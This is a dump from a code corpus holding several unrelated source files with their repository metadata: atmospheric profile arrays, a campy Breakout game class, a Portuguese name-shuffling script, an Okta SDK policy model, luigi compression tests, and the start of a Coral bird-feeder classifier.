6.83105600e+03, 6.63557500e+03, 6.44820100e+03,
6.26853800e+03, 6.09616900e+03, 5.93072700e+03,
5.77187200e+03, 5.61926500e+03])
self["P"] = numpy.array([ 5.00000000e-03, 1.61000000e-02, 3.84000000e-02,
7.69000000e-02, 1.37000000e-01, 2.24400000e-01,
3.45400000e-01, 5.06400000e-01, 7.14000000e-01,
9.75300000e-01, 1.29720000e+00, 1.68720000e+00,
2.15260000e+00, 2.70090000e+00, 3.33980000e+00,
4.07700000e+00, 4.92040000e+00, 5.87760000e+00,
6.95670000e+00, 8.16550000e+00, 9.51190000e+00,
1.10038000e+01, 1.26492000e+01, 1.44559000e+01,
1.64318000e+01, 1.85847000e+01, 2.09224000e+01,
2.34526000e+01, 2.61829000e+01, 2.91210000e+01,
3.22744000e+01, 3.56505000e+01, 3.92566000e+01,
4.31001000e+01, 4.71882000e+01, 5.15278000e+01,
5.61260000e+01, 6.09895000e+01, 6.61253000e+01,
7.15398000e+01, 7.72396000e+01, 8.32310000e+01,
8.95204000e+01, 9.61138000e+01, 1.03017000e+02,
1.10237000e+02, 1.17778000e+02, 1.25646000e+02,
1.33846000e+02, 1.42385000e+02, 1.51266000e+02,
1.60496000e+02, 1.70078000e+02, 1.80018000e+02,
1.90320000e+02, 2.00989000e+02, 2.12028000e+02,
2.23442000e+02, 2.35234000e+02, 2.47408000e+02,
2.59969000e+02, 2.72919000e+02, 2.86262000e+02,
3.00000000e+02, 3.14137000e+02, 3.28675000e+02,
3.43618000e+02, 3.58966000e+02, 3.74724000e+02,
3.90893000e+02, 4.07474000e+02, 4.24470000e+02,
4.41882000e+02, 4.59712000e+02, 4.77961000e+02,
4.96630000e+02, 5.15720000e+02, 5.35232000e+02,
5.55167000e+02, 5.75525000e+02, 5.96306000e+02,
6.17511000e+02, 6.39140000e+02, 6.61192000e+02,
6.83667000e+02, 7.06565000e+02, 7.29886000e+02,
7.53628000e+02, 7.77790000e+02, 8.02371000e+02,
8.27371000e+02, 8.52788000e+02, 8.78620000e+02,
9.04866000e+02, 9.31524000e+02, 9.58591000e+02,
9.86067000e+02, 1.01395000e+03, 1.04223000e+03,
1.07092000e+03, 1.10000000e+03])
self["CO2"] = numpy.array([ 375.9234, 375.9232, 375.9219, 375.9195, 375.9172, 375.9142,
375.9041, 375.8819, 375.8607, 375.8617, 375.8997, 375.9717,
376.0398, 376.0858, 376.1489, 376.212 , 376.224 , 376.2321,
376.2481, 376.2772, 376.3252, 376.3663, 376.4023, 376.4224,
376.4504, 376.4865, 376.5545, 376.6335, 376.7605, 376.8966,
377.0446, 377.2036, 377.3766, 377.5606, 377.7106, 377.8485,
378.0765, 378.4945, 378.9365, 379.6475, 380.4225, 381.0245,
381.4085, 381.8025, 381.8315, 381.8625, 381.8985, 381.9405,
381.9845, 382.0364, 382.0903, 382.5651, 383.1618, 383.8894,
384.7668, 385.5962, 386.1156, 386.6532, 386.7607, 386.854 ,
386.8701, 386.8645, 386.8732, 386.8913, 386.9157, 386.9449,
386.9669, 386.9788, 386.9602, 386.9034, 386.8186, 386.7075,
386.6086, 386.5187, 386.4681, 386.4315, 386.4595, 386.5189,
386.6375, 386.8447, 387.1073, 387.3124, 387.433 , 387.3937,
387.2297, 386.9659, 386.6525, 386.3522, 386.1188, 385.9826,
385.9361, 385.8209, 385.7317, 385.4548, 385.5337, 385.6074,
385.6771, 385.744 , 385.8082, 385.8699, 385.9291])
self["CO"] = numpy.array([ 0.2205447 , 0.2185316 , 0.2145434 , 0.2078282 , 0.1977631 ,
0.1839901 , 0.1511932 , 0.09891954, 0.0827345 , 0.05454007,
0.02926452, 0.01534331, 0.01021024, 0.00922827, 0.00895567,
0.00841368, 0.00791632, 0.0076217 , 0.00749041, 0.00745301,
0.00740799, 0.00741502, 0.00746624, 0.00760092, 0.00775626,
0.00793258, 0.0081303 , 0.00834271, 0.00844155, 0.00854593,
0.00861921, 0.00869836, 0.00895125, 0.009236 , 0.00956421,
0.00993273, 0.01050776, 0.01155325, 0.01277055, 0.01483604,
0.01745463, 0.02009092, 0.02248201, 0.0252159 , 0.0250677 ,
0.0249136 , 0.0248554 , 0.0248671 , 0.0248747 , 0.0248604 ,
0.02484549, 0.02830606, 0.03349511, 0.03954063, 0.04649641,
0.05393566, 0.05777834, 0.06203953, 0.06291754, 0.06367061,
0.06376177, 0.06365417, 0.06355173, 0.06345124, 0.063449 ,
0.06353453, 0.06376724, 0.06416551, 0.06445159, 0.0646028 ,
0.06451203, 0.06417925, 0.06369376, 0.06310236, 0.06261609,
0.06216137, 0.06196 , 0.06180874, 0.06178709, 0.06208905,
0.06263239, 0.06350083, 0.06423774, 0.06476787, 0.06481747,
0.06471838, 0.06458966, 0.06447546, 0.06438733, 0.06432344,
0.06428367, 0.06423741, 0.0641983 , 0.06589368, 0.07015209,
0.07475692, 0.0797395 , 0.08513432, 0.09097941, 0.09731644,
0.1041912 ])
self["T"] = numpy.array([ 189.265, 197.336, 211.688, 227.871, 242.446, 252.765,
259.432, 262.908, 263.411, 262.202, 261.422, 259.368,
255.095, 250.075, 244.792, 239.205, 235.817, 231.46 ,
227.966, 225.935, 225.115, 222.382, 219.723, 218.152,
217.875, 218.211, 218.288, 218.294, 217.949, 217.202,
216.158, 214.964, 215.259, 215.053, 215.409, 216.081,
216.441, 216.152, 215.427, 215.082, 216.198, 217.247,
217.006, 216.373, 216.342, 217.088, 218.419, 219.839,
220.797, 220.946, 221.423, 222.504, 223.822, 225.134,
226.221, 226.93 , 227.275, 227.405, 227.434, 227.346,
227.212, 227.246, 227.566, 228.2 , 229.083, 230.094,
231.117, 232.121, 233.086, 234.01 , 235.064, 236.351,
237.928, 239.892, 242.039, 244.306, 246.651, 249.025,
251.415, 253.802, 256.16 , 258.448, 260.591, 262.445,
264.071, 265.349, 266.233, 266.969, 267.78 , 268.72 ,
269.42 , 270.502, 271.421, 273.317, 273.317, 273.317,
273.317, 273.317, 273.317, 273.317, 273.317])
self["N2O"] = numpy.array([ 0.00161 , 0.00187 , 0.00205999, 0.00220999, 0.00233999,
0.00235999, 0.00157999, 0.00186999, 0.00519997, 0.00870995,
0.00838995, 0.00955994, 0.01208993, 0.01432992, 0.0171399 ,
0.02172988, 0.02788985, 0.03756981, 0.04630977, 0.05168975,
0.05680973, 0.05922973, 0.06028973, 0.06131974, 0.07010971,
0.07957968, 0.08867964, 0.09929961, 0.1101496 , 0.1206295 ,
0.1301795 , 0.1371795 , 0.1439595 , 0.1505294 , 0.1651494 ,
0.1848693 , 0.2034792 , 0.2285391 , 0.252299 , 0.2748389 ,
0.2840589 , 0.2926288 , 0.3004188 , 0.3072488 , 0.3129187 ,
0.3172487 , 0.3200187 , 0.3209987 , 0.3209987 , 0.3209987 ,
0.3209986 , 0.3209984 , 0.3209982 , 0.3209978 , 0.3209973 ,
0.3209968 , 0.3209964 , 0.320996 , 0.3209956 , 0.320995 ,
0.3209943 , 0.3209938 , 0.3209936 , 0.3209936 , 0.3209939 ,
0.3209941 , 0.3209941 , 0.3209941 , 0.3209935 , 0.3209896 ,
0.3209797 , 0.3209647 , 0.3209449 , 0.3209225 , 0.3209021 ,
0.3208842 , 0.32087 , 0.3208663 , 0.3208701 , 0.3208845 ,
0.3209016 , 0.3209026 , 0.3208633 , 0.3207191 , 0.3204841 ,
0.320189 , 0.3198736 , 0.3195881 , 0.3193787 , 0.319266 ,
0.3192201 , 0.3191182 , 0.3190395 , 0.3188072 , 0.31887 ,
0.3189301 , 0.3189878 , 0.3190431 , 0.3190962 , 0.3191472 ,
0.3191962 ])
self["O3"] = numpy.array([ 0.1903137 , 0.2192386 , 0.3077081 , 0.5440408 , 0.8590299 ,
1.170854 , 1.499102 , 1.864289 , 2.273556 , 2.805293 ,
3.409769 , 4.028786 , 4.806182 , 5.619898 , 6.411164 ,
7.147361 , 7.51202 , 7.648961 , 7.644362 , 7.556123 ,
7.446574 , 7.281136 , 6.952659 , 6.604492 , 6.296854 ,
6.008776 , 5.751387 , 5.520268 , 5.311749 , 5.111921 ,
4.890092 , 4.593293 , 4.298724 , 3.882905 , 3.380027 ,
2.799559 , 2.288161 , 2.031152 , 2.018272 , 2.047542 ,
1.969722 , 1.685453 , 1.220825 , 0.9176053 , 0.8929574 ,
0.9542592 , 1.004996 , 1.034796 , 1.031726 , 1.019046 ,
0.8797071 , 0.6484178 , 0.4105526 , 0.2529783 , 0.1943934 ,
0.201197 , 0.2459162 , 0.322179 , 0.3977806 , 0.4292413 ,
0.4255834 , 0.3930204 , 0.3461121 , 0.2989281 , 0.2606191 ,
0.2321107 , 0.2069452 , 0.1838146 , 0.1618567 , 0.1410414 ,
0.1225313 , 0.1061913 , 0.09214328, 0.08133816, 0.07293074,
0.06636085, 0.06143102, 0.05859298, 0.05740586, 0.05732126,
0.05783027, 0.05809797, 0.05651443, 0.05019414, 0.0404447 ,
0.03280082, 0.02944741, 0.02902179, 0.02945348, 0.02918976,
0.02836743, 0.02750451, 0.02608958, 0.02225294, 0.02225732,
0.02226152, 0.02226555, 0.02226941, 0.02227312, 0.02227668,
0.02228009])
self["CH4"] = numpy.array([ 0.1059488, 0.1201298, 0.1306706, 0.1417254, 0.1691352,
0.209023 , 0.2345078, 0.2578465, 0.2845033, 0.328699 ,
0.3987896, 0.4800421, 0.5668716, 0.6510682, 0.7280449,
0.7954147, 0.8518465, 0.8903115, 0.9281374, 0.9731752,
1.016085 , 1.071595 , 1.131985 , 1.189835 , 1.247015 ,
1.302185 , 1.355285 , 1.400504 , 1.442154 , 1.464494 ,
1.488464 , 1.514124 , 1.541544 , 1.560774 , 1.579304 ,
1.596804 , 1.612894 , 1.627174 , 1.638294 , 1.650024 ,
1.662373 , 1.675353 , 1.688973 , 1.722213 , 1.729283 ,
1.736683 , 1.741733 , 1.745103 , 1.749093 , 1.755483 ,
1.762122 , 1.770021 , 1.77847 , 1.785498 , 1.790785 ,
1.795642 , 1.79793 , 1.800308 , 1.800506 , 1.800632 ,
1.800498 , 1.800295 , 1.800414 , 1.800704 , 1.800856 ,
1.800867 , 1.800517 , 1.799787 , 1.798434 , 1.796372 ,
1.794017 , 1.791393 , 1.789133 , 1.787118 , 1.785875 ,
1.784886 , 1.784827 , 1.785476 , 1.788046 , 1.791395 ,
1.795229 , 1.798224 , 1.800263 , 1.801052 , 1.800931 ,
1.80036 , 1.799234 , 1.797877 , 1.796739 , 1.796035 ,
1.795827 , 1.795294 , 1.79488 , 1.793604 , 1.793966 ,
1.794315 , 1.794639 , 1.794951 , 1.795249 , 1.795536 ,
1.795812 ])
self["CTP"] = 500.0
self["CFRACTION"] = 0.0
self["IDG"] = 0
self["ISH"] = 0
self["ELEVATION"] = 0.0
self["S2M"]["T"] = 273.317
self["S2M"]["Q"] = 5619.26541873
self["S2M"]["O"] = 0.022280094739
self["S2M"]["P"] = 905.85559
self["S2M"]["U"] = 0.0
self["S2M"]["V"] = 0.0
self["S2M"]["WFETC"] = 100000.0
self["SKIN"]["SURFTYPE"] = 0
self["SKIN"]["WATERTYPE"] = 1
self["SKIN"]["T"] = 273.317
self["SKIN"]["SALINITY"] = 35.0
self["SKIN"]["FOAM_FRACTION"] = 0.0
self["SKIN"]["FASTEM"] = numpy.array([ 3. , 5. , 15. , 0.1, 0.3])
self["ZENANGLE"] = 0.0
self["AZANGLE"] = 0.0
self["SUNZENANGLE"] = 0.0
self["SUNAZANGLE"] = 0.0
self["LATITUDE"] = 45.309
self["GAS_UNITS"] = 2
self["BE"] = 0.0
self["COSBK"] = 0.0
self["DATE"] = numpy.array([2007, 4, 1])
self["TIME"] = numpy.array([0, 0, 0])
| 57.508621
| 92
| 0.570979
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 462
| 0.034627
|
0cfdd69003365202954e59ba474c596cdd274c91
| 10,386
|
py
|
Python
|
stanCode_Projects/break_out_game/breakoutgraphics.py
|
kunyi1022/sc-projects
|
0ab0019b2cdc86c434a0acff39b862263dcbc970
|
[
"MIT"
] | null | null | null |
stanCode_Projects/break_out_game/breakoutgraphics.py
|
kunyi1022/sc-projects
|
0ab0019b2cdc86c434a0acff39b862263dcbc970
|
[
"MIT"
] | null | null | null |
stanCode_Projects/break_out_game/breakoutgraphics.py
|
kunyi1022/sc-projects
|
0ab0019b2cdc86c434a0acff39b862263dcbc970
|
[
"MIT"
] | null | null | null |
"""
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao
File: breakoutgraphics.py
Name: 林坤毅 Jordan
-------------------------
This python file will create a class named BreakoutGraphics for the break out game.
This class will contain the building block for creating that game.
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmouseclicked, onmousemoved
import random
BRICK_SPACING = 5 # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.
BRICK_WIDTH = 40 # Width of a brick (in pixels).
BRICK_HEIGHT = 15 # Height of a brick (in pixels).
BRICK_ROWS = 10 # Number of rows of bricks.
BRICK_COLS = 10 # Number of columns of bricks.
BRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10 # Radius of the ball (in pixels).
PADDLE_WIDTH = 75 # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15 # Height of the paddle (in pixels).
PADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).
INITIAL_Y_SPEED = 7 # Initial vertical speed for the ball.
MAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.
class BreakoutGraphics:
def __init__(self, ball_radius = BALL_RADIUS, paddle_width = PADDLE_WIDTH,
paddle_height = PADDLE_HEIGHT, paddle_offset = PADDLE_OFFSET,
brick_rows = BRICK_ROWS, brick_cols = BRICK_COLS,
brick_width = BRICK_WIDTH, brick_height = BRICK_HEIGHT,
brick_offset = BRICK_OFFSET, brick_spacing = BRICK_SPACING,
title='Breakout'):
"""
The basic parameters for building these breakout game.
:param ball_radius: The radius of the ball.
:param paddle_width: The width of the paddle.
:param paddle_height: The height of the paddle.
:param paddle_offset: The distance between paddle and the bottom of the window.
:param brick_rows: The number of rows in bricks.
:param brick_cols: The number of column in bricks.
:param brick_width: The width of each brick.
:param brick_height: The height of each brick.
:param brick_offset: The distance between the first row of bricks and the top of the window.
:param brick_spacing: The spacing between each brick.
:param title: The name of this program.
"""
# Create a graphical window, with some extra space
self.window_width = brick_cols * (brick_width + brick_spacing) - brick_spacing
self.window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) - brick_spacing)
self.window = GWindow(width=self.window_width, height=self.window_height, title=title)
# Create a paddle
self.paddle = GRect(paddle_width, paddle_height, x=(self.window_width-paddle_width)/2, y=(self.window_height-paddle_offset))
self.paddle.filled = True
self.paddle.color = 'black'
self.paddle.fill_color = 'black'
self.window.add(self.paddle)
self.paddle_width = paddle_width
self.paddle_height = paddle_height
self.paddle_offset = paddle_offset
# Center a filled ball in the graphical window
self.ball = GOval(ball_radius*2, ball_radius*2, x=(self.window_width-ball_radius*2)/2, y=(self.window_height-ball_radius*2)/2)
self.ball.filled = True
self.ball.fill_color = 'black'
self.window.add(self.ball)
self.ball_radius = ball_radius
# Default initial velocity for the ball
self.__dx = 0 # self.__dx = random.randint(1, MAX_X_SPEED)
self.__dy = 0 # self.__dy = INITIAL_Y_SPEED
# if random.random() > 0.5:
# self.__dx = -self.__dx
# The commented-out lines above were a mistake I made while doing this homework.
# Draw bricks
for i in range(brick_cols):
for j in range(brick_rows):
# Crucial point! This cannot be placed outside the for loops: each brick needs its own GRect.
brick = GRect(brick_width, brick_height)
brick.x = (brick_width+brick_spacing)*i
brick.y = brick_offset+(brick_height+brick_spacing)*j
brick.filled = True
if j < 2:
brick.fill_color = 'red'
elif j < 4:
brick.fill_color = 'orange'
elif j < 6:
brick.fill_color = 'yellow'
elif j < 8:
brick.fill_color = 'green'
elif j < 10:
brick.fill_color = 'blue'
elif j < 12:
brick.fill_color = 'teal'
elif j < 14:
brick.fill_color = 'chocolate'
self.window.add(brick)
# Initialize our mouse listeners
onmouseclicked(self.is_start_game)
onmousemoved(self.moving_paddle)
# Total bricks
self.total_bricks = brick_cols * brick_rows
def is_start_game(self, event): # Crucial point!!! Stuck here for three days! The initial velocity!
"""
Starts the game on the first mouse click by giving the ball its initial velocity.
:param event: The information of the mouse, including (x,y) of it.
:return: Set the __dx and __dy of the ball.
"""
if event.x != -1 and event.y != -1 and self.__dx == 0 and self.__dy == 0:
self.__dx = random.randint(1, MAX_X_SPEED)
self.__dy = INITIAL_Y_SPEED
if random.random() > 0.5:
self.__dx = -self.__dx
def check_for_collisions(self):
"""
Checks the four corners of the ball's bounding box for a collision with any object.
:return: True if any corner touches an object; that object is stored in self.obj.
"""
one = self.window.get_object_at(self.ball.x, self.ball.y)
two = self.window.get_object_at(self.ball.x + 2*self.ball_radius, self.ball.y)
three = self.window.get_object_at(self.ball.x, self.ball.y + 2*self.ball_radius)
four = self.window.get_object_at(self.ball.x + 2*self.ball_radius, self.ball.y + 2*self.ball_radius)
if one is not None:
    self.obj = one
    return True
elif two is not None:
    self.obj = two
    return True
elif three is not None:
    self.obj = three
    return True
elif four is not None:
    self.obj = four
    return True
return False
def check_object_type(self):
"""
The objects above the half of the window height are bricks and the object below the half of the window height is paddle.
:return: boolean value. Bricks return True and paddle returns False.
"""
if self.ball.y > self.window.height/2:
return True
else:
return False
def moving_ball(self):
"""
The method for moving ball.
:return: The moving result of the ball.
"""
self.ball.move(self.__dx, self.__dy)
def moving_paddle(self, event):
"""
The method for moving paddle.
:param event: The information of the mouse, including (x,y) of it.
:return: The moving result of the paddle.
"""
if 0 <= event.x - self.paddle_width/2 <= self.window_width - self.paddle_width:
self.paddle.x = event.x - self.paddle_width / 2
def reset_ball(self):
"""
When the ball falls below the paddle and the game is not yet over, reset the ball to its original position.
:return: The ball at the original position.
"""
self.ball = GOval(self.ball_radius * 2, self.ball_radius * 2, x=(self.window_width - self.ball_radius * 2) / 2,
y=(self.window_height - self.ball_radius * 2) / 2)
self.ball.filled = True
self.ball.fill_color = 'black'
self.window.add(self.ball)
self.__dx = 0
self.__dy = 0
def set_dx(self, new_dx):
"""
Set the new __dx.
:param new_dx: The new dx.
:return: __dx.
"""
self.__dx = new_dx
def set_dy(self, new_dy):
"""
Set the new __dy.
:param new_dy: The new dy.
:return: __dy.
"""
self.__dy = new_dy
def get_dx(self):
"""
Get the information of __dx from class BreakoutGraphics.
:return: The __dx for the ball.
"""
return self.__dx
def get_dy(self):
"""
Get the information of __dy from class BreakoutGraphics.
:return: The __dy for the ball.
"""
return self.__dy
def set_dx_collision(self, new_dx):
"""
Set the new __dx for ball after colliding with bricks.
:param new_dx: The new dx.
:return: __dx.
"""
if random.random() > 0.5:
self.__dx = new_dx
else:
self.__dx = -new_dx
def game_over(self):
"""
The label for game over.
:return: The label for game over.
"""
label = GLabel('Game Over!!!')
# The font size below is tuned for a 10*10 brick layout.
# If the number of rows or columns changes, it will probably no longer fit.
label.font = '-40'
self.window.add(label, x= self.window_width/2 - 100, y=self.window_height/2 + 100)
def game_win(self):
"""
The label for game win.
:return: The label for game win.
"""
label = GLabel('You Win!!!')
# The font size below is tuned for a 10*10 brick layout.
# If the number of rows or columns changes, it will probably no longer fit.
label.font = '-40'
self.window.add(label, x=self.window_width / 2 - 100, y=self.window_height / 2 + 100)
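A minimal driver sketch for the class above (assuming campy's pause helper; the frame rate and wall-bounce handling are illustrative and omit brick removal and life counting):

from campy.gui.events.timer import pause

FRAME_RATE = 1000 / 120  # 120 frames per second

def main():
    graphics = BreakoutGraphics()
    while True:
        # The ball stays still (dx = dy = 0) until is_start_game fires on a click.
        graphics.moving_ball()
        if graphics.ball.x <= 0 or graphics.ball.x + 2 * graphics.ball_radius >= graphics.window_width:
            graphics.set_dx(-graphics.get_dx())  # bounce off the left/right walls
        if graphics.ball.y <= 0:
            graphics.set_dy(-graphics.get_dy())  # bounce off the top wall
        pause(FRAME_RATE)

if __name__ == '__main__':
    main()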
| 39.192453
| 134
| 0.604756
| 9,028
| 0.868745
| 0
| 0
| 0
| 0
| 0
| 0
| 4,380
| 0.421478
|
0cfe0c2510332685f3cc3783752192ba32a124ab
| 329
|
py
|
Python
|
PythonExercicios/ex020.py
|
github-felipe/ExerciciosEmPython-cursoemvideo
|
0045464a287f21b6245554a975588cf06c5b476d
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex020.py
|
github-felipe/ExerciciosEmPython-cursoemvideo
|
0045464a287f21b6245554a975588cf06c5b476d
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex020.py
|
github-felipe/ExerciciosEmPython-cursoemvideo
|
0045464a287f21b6245554a975588cf06c5b476d
|
[
"MIT"
] | null | null | null |
from random import shuffle
# Prompts are kept in the original Portuguese; English translations in the trailing comments.
a1 = str(input('Digite o nome de um aluno: '))  # 'Enter the name of a student: '
a2 = str(input('Digite o nome de outro aluno: '))  # 'Enter the name of another student: '
a3 = str(input('Digite o nome de mais outro aluno: '))  # 'Enter the name of yet another student: '
a4 = str(input('Digite o nome do último aluno: '))  # 'Enter the name of the last student: '
lista = [a1, a2, a3, a4]
shuffle(lista)
print(f'A ordem de apresentação é: \033[34m{lista}\033[m')  # 'The presentation order is: ...'
| 36.555556
| 58
| 0.680851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 186
| 0.558559
|
4901c51c1ea8530e44c195ecd1215f420a39da2d
| 3,940
|
py
|
Python
|
okta/models/profile_enrollment_policy_rule_action.py
|
ander501/okta-sdk-python
|
0927dc6a2f6d5ebf7cd1ea806d81065094c92471
|
[
"Apache-2.0"
] | null | null | null |
okta/models/profile_enrollment_policy_rule_action.py
|
ander501/okta-sdk-python
|
0927dc6a2f6d5ebf7cd1ea806d81065094c92471
|
[
"Apache-2.0"
] | null | null | null |
okta/models/profile_enrollment_policy_rule_action.py
|
ander501/okta-sdk-python
|
0927dc6a2f6d5ebf7cd1ea806d81065094c92471
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
"""
Copyright 2021 - Present Okta, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# AUTO-GENERATED! DO NOT EDIT FILE DIRECTLY
# SEE CONTRIBUTOR DOCUMENTATION
from okta.okta_object import OktaObject
from okta.okta_collection import OktaCollection
from okta.models import profile_enrollment_policy_rule_activation_requirement\
as profile_enrollment_policy_rule_activation_requirement
from okta.models import pre_registration_inline_hook\
as pre_registration_inline_hook
from okta.models import profile_enrollment_policy_rule_profile_attribute\
as profile_enrollment_policy_rule_profile_attribute
class ProfileEnrollmentPolicyRuleAction(
OktaObject
):
"""
A class for ProfileEnrollmentPolicyRuleAction objects.
"""
def __init__(self, config=None):
super().__init__(config)
if config:
self.access = config["access"]\
if "access" in config else None
if "activationRequirements" in config:
if isinstance(config["activationRequirements"],
profile_enrollment_policy_rule_activation_requirement.ProfileEnrollmentPolicyRuleActivationRequirement):
self.activation_requirements = config["activationRequirements"]
elif config["activationRequirements"] is not None:
self.activation_requirements = profile_enrollment_policy_rule_activation_requirement.ProfileEnrollmentPolicyRuleActivationRequirement(
config["activationRequirements"]
)
else:
self.activation_requirements = None
else:
self.activation_requirements = None
self.pre_registration_inline_hooks = OktaCollection.form_list(
config["preRegistrationInlineHooks"] if "preRegistrationInlineHooks"\
in config else [],
pre_registration_inline_hook.PreRegistrationInlineHook
)
self.profile_attributes = OktaCollection.form_list(
config["profileAttributes"] if "profileAttributes"\
in config else [],
profile_enrollment_policy_rule_profile_attribute.ProfileEnrollmentPolicyRuleProfileAttribute
)
self.target_group_ids = OktaCollection.form_list(
config["targetGroupIds"] if "targetGroupIds"\
in config else [],
str
)
self.unknown_user_action = config["unknownUserAction"]\
if "unknownUserAction" in config else None
else:
self.access = None
self.activation_requirements = None
self.pre_registration_inline_hooks = []
self.profile_attributes = []
self.target_group_ids = []
self.unknown_user_action = None
def request_format(self):
parent_req_format = super().request_format()
current_obj_format = {
"access": self.access,
"activationRequirements": self.activation_requirements,
"preRegistrationInlineHooks": self.pre_registration_inline_hooks,
"profileAttributes": self.profile_attributes,
"targetGroupIds": self.target_group_ids,
"unknownUserAction": self.unknown_user_action
}
parent_req_format.update(current_obj_format)
return parent_req_format
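A usage sketch for the generated model above (field values are illustrative; constructing from a dict mirrors how the SDK deserializes API responses):

action = ProfileEnrollmentPolicyRuleAction({
    "access": "ALLOW",
    "unknownUserAction": "REGISTER",
    "targetGroupIds": ["00g1abc2defGHIJK3l4x"],  # illustrative group id
})
print(action.request_format()["unknownUserAction"])  # -> REGISTER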
| 42.826087
| 154
| 0.679949
| 2,831
| 0.718528
| 0
| 0
| 0
| 0
| 0
| 0
| 1,136
| 0.288325
|
490301996f235103083f9f733d639e25da1a8a52
| 1,478
|
py
|
Python
|
test/test_compression.py
|
Peter42/iasi
|
fc799d542c2bb80c3f559bc2f9e833ac330a5506
|
[
"MIT"
] | null | null | null |
test/test_compression.py
|
Peter42/iasi
|
fc799d542c2bb80c3f559bc2f9e833ac330a5506
|
[
"MIT"
] | 3
|
2019-05-02T12:49:21.000Z
|
2019-06-12T09:11:00.000Z
|
test/test_compression.py
|
Peter42/iasi
|
fc799d542c2bb80c3f559bc2f9e833ac330a5506
|
[
"MIT"
] | 1
|
2019-10-18T21:33:33.000Z
|
2019-10-18T21:33:33.000Z
|
import datetime
import unittest
import luigi
import numpy as np
from netCDF4 import Dataset
from iasi.compression import (CompressDataset, CompressDateRange,
DecompressDataset)
class TestCompression(unittest.TestCase):
def test_dataset_compression(self):
task = CompressDataset(
file='test/resources/MOTIV-single-event.nc',
dst='/tmp/iasi',
force=True,
threshold=0.01,
log_file=False
)
assert luigi.build([task], local_scheduler=True)
with Dataset(task.output().path) as nc:
state = nc['state']
subgroups = state.groups.keys()
self.assertListEqual(
list(subgroups), ['GHG', 'HNO3', 'Tatm', 'Tskin', 'WV'])
def test_dataset_decompression(self):
task = DecompressDataset(
file='test/resources/MOTIV-single-event.nc',
dst='/tmp/iasi',
force=True,
log_file=False,
compress_upstream=True
)
success = luigi.build([task], local_scheduler=True)
self.assertTrue(success)
class TestDateInterval(unittest.TestCase):
def test_date_range(self):
# end date is not inclusive
interval = luigi.date_interval.Custom.parse('2016-06-01-2016-06-30')
task = CompressDateRange(date_interval=interval, dst='/tmp/iasi', src='test/resources')
luigi.build([task], local_scheduler=True)
| 30.791667
| 95
| 0.614344
| 1,263
| 0.854533
| 0
| 0
| 0
| 0
| 0
| 0
| 210
| 0.142084
|
4905009d57cff19e66575a7bfdba66a5dbebafe6
| 6,310
|
py
|
Python
|
bird_classify.py
|
google-coral/project-birdfeeder
|
3bcb9bfd4123a0c6f16a09087a8ccdfe0c6dd80e
|
[
"Apache-2.0"
] | 26
|
2019-07-23T22:32:08.000Z
|
2022-01-09T15:15:50.000Z
|
bird_classify.py
|
hjonnala/project-birdfeeder
|
4375a9370d7567b756b6cc68f4dfcb4c8183b118
|
[
"Apache-2.0"
] | 13
|
2019-07-26T17:10:48.000Z
|
2022-03-01T04:11:48.000Z
|
bird_classify.py
|
hjonnala/project-birdfeeder
|
4375a9370d7567b756b6cc68f4dfcb4c8183b118
|
[
"Apache-2.0"
] | 19
|
2019-11-05T03:01:31.000Z
|
2022-03-29T01:13:46.000Z
|
#!/usr/bin/python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Coral Smart Bird Feeder
Uses a TensorFlow Lite classification model (through the pycoral API imported below)
to analyze animals in camera frames. Sounds a deterrent if a squirrel is detected.
Users define model, labels file, storage path, deterrent sound, and
optionally can set this to training mode for collecting images for a custom
model.
"""
import argparse
import time
import logging
from PIL import Image
from playsound import playsound
from pycoral.utils.dataset import read_label_file
from pycoral.utils.edgetpu import make_interpreter
from pycoral.adapters import common
from pycoral.adapters.classify import get_classes
import gstreamer
def save_data(image, results, path, ext='png'):
"""Saves camera frame and model inference results
to user-defined storage directory."""
tag = '%010d' % int(time.monotonic()*1000)
name = '%s/img-%s.%s' % (path, tag, ext)
image.save(name)
print('Frame saved as: %s' % name)
logging.info('Image: %s Results: %s', tag, results)
def print_results(start_time, last_time, end_time, results):
"""Print results to terminal for debugging."""
inference_rate = ((end_time - start_time) * 1000)
fps = (1.0/(end_time - last_time))
print('\nInference: %.2f ms, FPS: %.2f fps' % (inference_rate, fps))
for label, score in results:
print(' %s, score=%.2f' % (label, score))
def do_training(results, last_results, top_k):
"""Compares current model results to previous results and returns
true if at least one label difference is detected. Used to collect
images for training a custom model."""
new_labels = [label[0] for label in results]
old_labels = [label[0] for label in last_results]
shared_labels = set(new_labels).intersection(old_labels)
if len(shared_labels) < top_k:
print('Difference detected')
return True
return False
def user_selections():
parser = argparse.ArgumentParser()
parser.add_argument('--model', required=True,
help='.tflite model path')
parser.add_argument('--labels', required=True,
help='label file path')
parser.add_argument('--videosrc', help='Which video source to use', default='/dev/video0')
parser.add_argument('--top_k', type=int, default=3,
help='number of classes with highest score to display')
parser.add_argument('--threshold', type=float, default=0.1,
help='class score threshold')
